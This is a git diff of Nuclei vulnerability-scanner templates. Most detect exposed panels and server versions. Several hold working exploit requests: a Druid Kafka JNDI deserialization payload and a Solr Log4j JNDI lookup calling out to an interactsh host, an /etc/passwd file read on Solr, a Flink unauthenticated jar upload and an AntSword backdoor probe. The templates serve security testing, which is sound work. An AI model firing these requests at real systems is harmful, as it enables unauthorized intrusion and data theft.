severity: info + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + metadata: + shodan-query: http.html:"Semaphore" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,ansible,semaphore,cicd,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/login' + + matchers-condition: or + matchers: + - type: word + words: + - 'Ansible Semaphore' + + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/ansible-semaphore-panel.yaml b/nuclei-templates/Other/ansible-semaphore-panel.yaml deleted file mode 100644 index 0aa276d1d5..0000000000 --- a/nuclei-templates/Other/ansible-semaphore-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: ansible-semaphore-panel - -info: - name: Ansible Semaphore Panel - author: Yuzhe-zhang-0 - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 - tags: panel,ansible,semaphore,cicd - -requests: - - method: GET - redirects: true - max-redirects: 5 - path: - - '{{BaseURL}}/' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ansible Semaphore' - - '>Semaphore' - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure-331.yaml b/nuclei-templates/Other/ansible-tower-exposure-331.yaml deleted file mode 100644 index 72789c4755..0000000000 --- a/nuclei-templates/Other/ansible-tower-exposure-331.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: ansible-tower-exposure - -info: - name: Ansible Tower Exposure - author: pdteam - severity: low - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure.yaml b/nuclei-templates/Other/ansible-tower-exposure.yaml new file mode 100644 index 0000000000..66766fc246 --- /dev/null +++ b/nuclei-templates/Other/ansible-tower-exposure.yaml @@ -0,0 +1,37 @@ +id: ansible-tower-exposure + +info: + name: Ansible Tower Exposure + author: pdteam,idealphase + severity: low + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + classification: + cwe-id: CWE-200 + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Ansible Tower" + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/antsword-backdoor-334.yaml b/nuclei-templates/Other/antsword-backdoor-334.yaml deleted file mode 100644 index 27ea2ed01c..0000000000 --- a/nuclei-templates/Other/antsword-backdoor-334.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: antsword-backdoor - -info: - name: AntSword Backdoor Detection - author: ffffffff0x - severity: critical - description: An AntSword application backdoor shell was discovered. - reference: - - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - tags: backdoor,antsword - -requests: - - method: POST - path: - - "{{BaseURL}}/.antproxy.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: 'ant=echo md5("antproxy.php");' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "951d11e51392117311602d0c25435d7f" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/antsword-backdoor.yaml b/nuclei-templates/Other/antsword-backdoor.yaml new file mode 100644 index 0000000000..5cf33c9815 --- /dev/null +++ b/nuclei-templates/Other/antsword-backdoor.yaml @@ -0,0 +1,32 @@ +id: antsword-backdoor +info: + name: AntSword Backdoor Detection + author: ffffffff0x + severity: critical + description: An AntSword application backdoor shell was discovered. + reference: + - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-553 + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + tags: backdoor,antsword +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/apache-apisix-panel-338.yaml b/nuclei-templates/Other/apache-apisix-panel-337.yaml similarity index 100% rename from nuclei-templates/Other/apache-apisix-panel-338.yaml rename to nuclei-templates/Other/apache-apisix-panel-337.yaml diff --git a/nuclei-templates/Other/apache-axis-detect-341.yaml b/nuclei-templates/Other/apache-axis-detect-341.yaml deleted file mode 100644 index 6f4d1ee697..0000000000 --- a/nuclei-templates/Other/apache-axis-detect-341.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: apache-axis-detect - -info: - name: apache-axis-detect - author: dogasantos - severity: info - description: Axis and Axis2 detection - metadata: - verified: true - shodan-query: http.html:"Apache Axis" - tags: tech,axis2,middleware,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/axis2/" - - "{{BaseURL}}/axis/" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Validate" - - "Welcome" - - "Axis" - - "deployed" - - "installation" - - "Admin" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-axis-detect.yaml b/nuclei-templates/Other/apache-axis-detect.yaml new file mode 100644 index 0000000000..b5b574a7b5 --- /dev/null +++ b/nuclei-templates/Other/apache-axis-detect.yaml @@ -0,0 +1,32 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apache-cocoon-detect-342.yaml b/nuclei-templates/Other/apache-cocoon-detect-342.yaml new file mode 100644 index 0000000000..50a7346bfe --- /dev/null +++ b/nuclei-templates/Other/apache-cocoon-detect-342.yaml @@ -0,0 +1,26 @@ +id: apache-cocoon-detect +info: + name: Apache Cocoon detect + author: ffffffff0x + severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Cocoon" + fofa-query: app="APACHE-Cocoon" + tags: apache,cocoon,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - "X-Cocoon-Version" + extractors: + - type: regex + part: header + regex: + - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/nuclei-templates/Other/apache-cocoon-detect.yaml b/nuclei-templates/Other/apache-cocoon-detect.yaml deleted file mode 100644 index 1d3b85ddc5..0000000000 --- a/nuclei-templates/Other/apache-cocoon-detect.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: apache-cocoon-detect -info: - name: Apache Cocoon detect - author: ffffffff0x - severity: info - metadata: - fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "X-Cocoon-Version" - - extractors: - - type: regex - part: header - regex: - - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/nuclei-templates/Other/apache-config-344.yaml b/nuclei-templates/Other/apache-config.yaml similarity index 100% rename from nuclei-templates/Other/apache-config-344.yaml rename to nuclei-templates/Other/apache-config.yaml diff --git a/nuclei-templates/Other/apache-detect-347.yaml b/nuclei-templates/Other/apache-detect-347.yaml new file mode 100644 index 0000000000..2c300ba97f --- /dev/null +++ b/nuclei-templates/Other/apache-detect-347.yaml @@ -0,0 +1,31 @@ +id: apache-detect + +info: + name: Apache Detection + author: philippedelteil + severity: info + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server diff --git a/nuclei-templates/Other/apache-detect.yaml b/nuclei-templates/Other/apache-detect.yaml deleted file mode 100644 index eeb8966be3..0000000000 --- a/nuclei-templates/Other/apache-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server diff --git a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml new file mode 100644 index 0000000000..c250daba2a --- /dev/null +++ b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml @@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.89626 + epss-percentile: 0.98692 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + "pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-dubbo-detect-351.yaml b/nuclei-templates/Other/apache-dubbo-detect-351.yaml new file mode 100644 index 0000000000..596550af0c --- /dev/null +++ b/nuclei-templates/Other/apache-dubbo-detect-351.yaml @@ -0,0 +1,20 @@ +id: apache-dubbo-detect + +info: + name: Apache dubbo detect + author: ffffffff0x + severity: info + metadata: + fofa-query: app="APACHE-dubbo" + tags: apache,dubbo,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Basic realm=\"dubbo\"" diff --git a/nuclei-templates/Other/apache-dubbo-detect.yaml b/nuclei-templates/Other/apache-dubbo-detect.yaml deleted file mode 100644 index 7005b42a4c..0000000000 --- a/nuclei-templates/Other/apache-dubbo-detect.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: apache-dubbo-detect -info: - name: Apache dubbo detect - author: ffffffff0x - severity: info - metadata: - fofa-query: app="APACHE-dubbo" - tags: apache,dubbo,tech - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: header - words: - - "Basic realm=\"dubbo\"" diff --git a/nuclei-templates/Other/apache-filename-enum-354.yaml b/nuclei-templates/Other/apache-filename-enum-354.yaml deleted file mode 100644 index a37c4b75bf..0000000000 --- a/nuclei-templates/Other/apache-filename-enum-354.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: apache-filename-enum -info: - name: Apache Filename Enumeration - author: geeknik - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - severity: low - tags: apache,misconfig -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "

Apache Server at" - condition: and diff --git a/nuclei-templates/Other/apache-filename-enum.yaml b/nuclei-templates/Other/apache-filename-enum.yaml new file mode 100644 index 0000000000..5a6f43d2f1 --- /dev/null +++ b/nuclei-templates/Other/apache-filename-enum.yaml @@ -0,0 +1,30 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + severity: low + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + tags: apache,misconfig + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml new file mode 100644 index 0000000000..3c5d43fda3 --- /dev/null +++ b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml @@ -0,0 +1,43 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/apache-flink-unauth-rce.yaml b/nuclei-templates/Other/apache-flink-unauth-rce.yaml deleted file mode 100644 index 196536f66e..0000000000 --- a/nuclei-templates/Other/apache-flink-unauth-rce.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: apache-flink-unauth-rce -info: - name: Apache Flink Unauth RCE - author: pikpikcu - severity: critical - tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-guacamole-361.yaml b/nuclei-templates/Other/apache-guacamole.yaml similarity index 100% rename from nuclei-templates/Other/apache-guacamole-361.yaml rename to nuclei-templates/Other/apache-guacamole.yaml diff --git a/nuclei-templates/Other/apache-nifi-rce.yaml b/nuclei-templates/Other/apache-nifi-rce.yaml deleted file mode 100644 index b3f77b6915..0000000000 --- a/nuclei-templates/Other/apache-nifi-rce.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: Apache-NiFi-rce - -info: - name: Apache NiFi系统API命令执行 - author: Str1am - severity: high - reference: https://github.com/imjdl/Apache-NiFi-Api-RCE/blob/master/exp.py - tags: NiFi,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/nifi-api/access/config" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "supportsLogin" - - "config" - - "true" - part: body - condition: and diff --git a/nuclei-templates/Other/apache-solr-file-read-368.yaml b/nuclei-templates/Other/apache-solr-file-read-368.yaml deleted file mode 100644 index 8af1e2bc32..0000000000 --- a/nuclei-templates/Other/apache-solr-file-read-368.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: apache-solr-file-read - -info: - name: Apache Solr <= 8.8.1 Arbitrary File Read - author: DhiyaneshDk - severity: high - tags: apache,solr,lfi - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" \ No newline at end of file diff --git a/nuclei-templates/Other/apache-solr-file-read.yaml b/nuclei-templates/Other/apache-solr-file-read.yaml new file mode 100644 index 0000000000..0f545b712a --- /dev/null +++ b/nuclei-templates/Other/apache-solr-file-read.yaml @@ -0,0 +1,37 @@ +id: apache-solr-file-read +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml new file mode 100644 index 0000000000..677d4dec7f --- /dev/null +++ b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml @@ -0,0 +1,43 @@ +id: apache-solr-log4j-rce +info: + name: Apache Solr 7+ - Log4j Remote Code Execution + author: Evan Rubinstein,nvn1729 + severity: critical + description: | + Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + reference: + - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 + - https://twitter.com/sirifu4k1/status/1470011568834424837 + - https://github.com/apache/solr/pull/454 + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + metadata: + verified: true + shodan-query: http.html:"Apache Solr" + tags: cve,cve2021,solr,oast,log4j,rce,apache,jndi +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/Other/apache-solr-log4j-rce.yaml b/nuclei-templates/Other/apache-solr-log4j-rce.yaml deleted file mode 100644 index 9a19f69c70..0000000000 --- a/nuclei-templates/Other/apache-solr-log4j-rce.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: apache-solr-log4j-rce -info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 - severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. - reference: - - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - - https://twitter.com/sirifu4k1/status/1470011568834424837 - - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/Apache-solr-unauth.yaml b/nuclei-templates/Other/apache-solr-unauth.yaml similarity index 100% rename from nuclei-templates/Other/Apache-solr-unauth.yaml rename to nuclei-templates/Other/apache-solr-unauth.yaml diff --git a/nuclei-templates/Other/apache-tomcat-snoop-375.yaml b/nuclei-templates/Other/apache-tomcat-snoop-375.yaml deleted file mode 100644 index 9cb1ec5328..0000000000 --- a/nuclei-templates/Other/apache-tomcat-snoop-375.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-tomcat-snoop - -info: - name: Apache Tomcat example page disclosure - snoop - author: pdteam - severity: low - description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. - reference: - - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks - tags: apache,misconfig,tomcat,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - 'Request URI: /examples/jsp/snp/snoop.jsp' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-tomcat-snoop-377.yaml b/nuclei-templates/Other/apache-tomcat-snoop-377.yaml new file mode 100644 index 0000000000..15b5a1beab --- /dev/null +++ b/nuclei-templates/Other/apache-tomcat-snoop-377.yaml @@ -0,0 +1,24 @@ +id: apache-tomcat-snoop + +info: + name: Apache Tomcat example page disclosure - snoop + author: pdteam + severity: low + description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. + reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks + tags: apache + +requests: + - method: GET + path: + - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - 'Request URI: /examples/jsp/snp/snoop.jsp' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/apc_info.yaml b/nuclei-templates/Other/apc-info-380.yaml similarity index 100% rename from nuclei-templates/Other/apc_info.yaml rename to nuclei-templates/Other/apc-info-380.yaml diff --git a/nuclei-templates/Other/apc-ups-login-381.yaml b/nuclei-templates/Other/apc-ups-login-381.yaml deleted file mode 100644 index 3573ace00e..0000000000 --- a/nuclei-templates/Other/apc-ups-login-381.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: apc-ups-login -info: - name: APC UPS Login - author: droberson - severity: info - metadata: - shodan-query: title:"APC | Log On" - tags: iot,panel -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apc-ups-login-382.yaml b/nuclei-templates/Other/apc-ups-login-382.yaml new file mode 100644 index 0000000000..f28e384f2c --- /dev/null +++ b/nuclei-templates/Other/apc-ups-login-382.yaml @@ -0,0 +1,24 @@ +id: apc-ups-login + +info: + name: APC UPS Login + author: droberson + severity: info + reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + tags: iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + + matchers-condition: and + matchers: + - type: word + words: + - 'APC | Log On' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-abstractapi-383.yaml b/nuclei-templates/Other/api-abstractapi-383.yaml deleted file mode 100644 index def3b63a7a..0000000000 --- a/nuclei-templates/Other/api-abstractapi-383.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-abstractapi -info: - name: Abstract Api Public Holidays Test - author: daffainfo - severity: info - reference: - - https://www.abstractapi.com/holidays-api - - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md - tags: token-spray,abstractapi -self-contained: true -requests: - - method: GET - path: - - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" - matchers: - - type: word - part: body - words: - - '"name_local":' - - '"location":' - - '"date_year":' - condition: and diff --git a/nuclei-templates/Other/api-abstractapi.yaml b/nuclei-templates/Other/api-abstractapi.yaml new file mode 100644 index 0000000000..b6eecac2ef --- /dev/null +++ b/nuclei-templates/Other/api-abstractapi.yaml @@ -0,0 +1,25 @@ +id: api-abstractapi + +info: + name: Abstract Api Public Holidays Test + author: daffainfo + severity: info + reference: + - https://www.abstractapi.com/holidays-api + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md + tags: token-spray,abstractapi + +self-contained: true +requests: + - method: GET + path: + - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" + + matchers: + - type: word + part: body + words: + - '"total_count":' + - '"limit":' + - '"offset":' + condition: and diff --git a/nuclei-templates/Other/api-adafruit-io-387.yaml b/nuclei-templates/Other/api-adafruit-io-387.yaml new file mode 100644 index 0000000000..5eba45190d --- /dev/null +++ b/nuclei-templates/Other/api-adafruit-io-387.yaml @@ -0,0 +1,22 @@ +id: api-adafruit-io +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: + - https://io.adafruit.com/api/docs/ + tags: token-spray,adafruit +self-contained: true +requests: + - method: GET + path: + - 